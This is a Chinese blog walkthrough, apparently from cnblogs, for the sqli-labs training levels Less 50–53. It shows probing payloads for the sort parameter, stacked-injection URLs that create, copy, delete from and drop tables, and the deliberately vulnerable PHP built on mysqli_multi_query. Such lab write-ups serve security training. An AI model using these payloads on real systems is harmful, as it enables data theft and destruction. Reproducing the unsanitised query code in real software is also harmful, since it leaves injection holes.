sqli-labs 通关指南:Less 50 ~ 53

Less 50 ~ 53 和 Less 46 ~ 49 的注入方法完全一样,但是这 4 个 Less 可以进行堆叠注入。

Less 50#

判断注入类型#

输入正常的参数,网页回显用户名列表。对 sort 参数使用单引号闭合,网页返回错误信息。

Copy Highlighter-hljs
?sort=1'


将后面的内容注释掉,网页返回错误的信息。进行下面的所有测试,得出此处存在数值型注入。

Copy Highlighter-hljs
?sort=1'--+ ?sort=1')--+ ?sort=1'))--+ ?sort=1"--+ ?sort=1")--+ ?sort=1"))--+

堆叠注入#

和 Less 46 一样使用报错注入或时间注入就可以完成,此处用于测试堆叠注入。使用堆叠查询完成 Less 38 的样例。

Copy Highlighter-hljs
?sort=1;CREATE TABLE WhiteMoon LIKE users;--+ ?sort=1;INSERT INTO WhiteMoon SELECT * FROM users;--+ ?sort=1;DELETE FROM WhiteMoon;--+ ?sort=1;DROP TABLE WhiteMoon;--+

SQL 查询语句#

Copy Highlighter-hljs
$sql = "SELECT * FROM users ORDER BY $id"; /* execute multi query */ if (mysqli_multi_query($con1, $sql)) { ?> <center> <font color= "#00FF00" size="4"> <table border=1'> <tr> <th>&nbsp;ID&nbsp;</th> <th>&nbsp;USERNAME&nbsp; </th> <th>&nbsp;PASSWORD&nbsp; </th> </tr> </font> </font> <?php /* store first result set */ if ($result = mysqli_store_result($con1)) { while($row = mysqli_fetch_row($result)) { echo '<font color= "#00FF11" size="3">'; echo "<tr>"; echo "<td>"; printf("%s", $row[0]); echo "</td>"; echo "<td>"; printf("%s", $row[1]); echo "</td>"; echo "<td>"; printf("%s", $row[2]); echo "</td>"; echo "</tr>"; echo "</font>"; } } echo "</table>"; }

Less 51#

判断注入类型#

输入正常参数,网页回显用户名列表。对 sort 参数使用单引号闭合,网页返回错误信息。

Copy Highlighter-hljs
?sort=1'

将后面的内容注释掉,网页返回正常的信息,得出此处存在单引号闭合的字符型注入。

Copy Highlighter-hljs
?sort=1'--+

堆叠注入#

和 Less 47 一样使用报错注入或时间注入就可以完成,此处用于测试堆叠注入。使用堆叠查询完成 Less 38 的样例。

Copy Highlighter-hljs
?sort=1';CREATE TABLE WhiteMoon LIKE users;--+ ?sort=1';INSERT INTO WhiteMoon SELECT * FROM users;--+ ?sort=1';DELETE FROM WhiteMoon;--+ ?sort=1';DROP TABLE WhiteMoon;--+

SQL 查询语句#

Copy Highlighter-hljs
$sql="SELECT * FROM users ORDER BY '$id'";

Less 52#

判断注入类型#

输入正常参数,网页回显用户名列表。对 sort 参数使用单引号闭合,网页无回显。

Copy Highlighter-hljs
?sort=1'


将后面的内容注释掉,网页无回显。进行下面的所有测试,得出此处存在数值型的盲注。

Copy Highlighter-hljs
?sort=1'--+ ?sort=1')--+ ?sort=1'))--+ ?sort=1"--+ ?sort=1")--+ ?sort=1"))--+

堆叠注入#

和 Less 48 一样使用时间盲注就可以完成,此处用于测试堆叠注入。使用堆叠查询完成 Less 38 的样例。

Copy Highlighter-hljs
?sort=1;CREATE TABLE WhiteMoon LIKE users;--+ ?sort=1;INSERT INTO WhiteMoon SELECT * FROM users;--+ ?sort=1;DELETE FROM WhiteMoon;--+ ?sort=1;DROP TABLE WhiteMoon;--+

SQL 查询语句#

Copy Highlighter-hljs
$sql = "SELECT * FROM users ORDER BY $id";

Less 53#

判断注入类型#

输入正常参数,网页回显用户名列表。对 sort 参数使用单引号闭合,网页无回显。

Copy Highlighter-hljs
?sort=1'


将后面的内容注释掉,网页用户名列表,得出此处存在单引号闭合的字符型的盲注。

Copy Highlighter-hljs
?sort=1'--+

堆叠注入#

和 Less 49 一样使用时间盲注就可以完成,此处用于测试堆叠注入。使用堆叠查询完成 Less 38 的样例。

Copy Highlighter-hljs
?sort=1';CREATE TABLE WhiteMoon LIKE users;--+ ?sort=1';INSERT INTO WhiteMoon SELECT * FROM users;--+ ?sort=1';DELETE FROM WhiteMoon;--+ ?sort=1';DROP TABLE WhiteMoon;--+

SQL 查询语句#

Copy Highlighter-hljs
$sql="SELECT * FROM users ORDER BY '$id'";
posted @   乌漆WhiteMoon  阅读(1169)  评论(0编辑  收藏  举报
编辑推荐:
· 智能桌面机器人:用.NET IoT库控制舵机并多方法播放表情
· Linux glibc自带哈希表的用例及性能测试
· 深入理解 Mybatis 分库分表执行原理
· 如何打造一个高并发系统?
· .NET Core GC压缩(compact_phase)底层原理浅谈
阅读排行:
· 手把手教你在本地部署DeepSeek R1,搭建web-ui ,建议收藏!
· 新年开篇:在本地部署DeepSeek大模型实现联网增强的AI应用
· 程序员常用高效实用工具推荐,办公效率提升利器!
· Janus Pro:DeepSeek 开源革新,多模态 AI 的未来
· 【译】WinForms:分析一下(我用 Visual Basic 写的)
点击右上角即可分享
微信分享提示
CONTENTS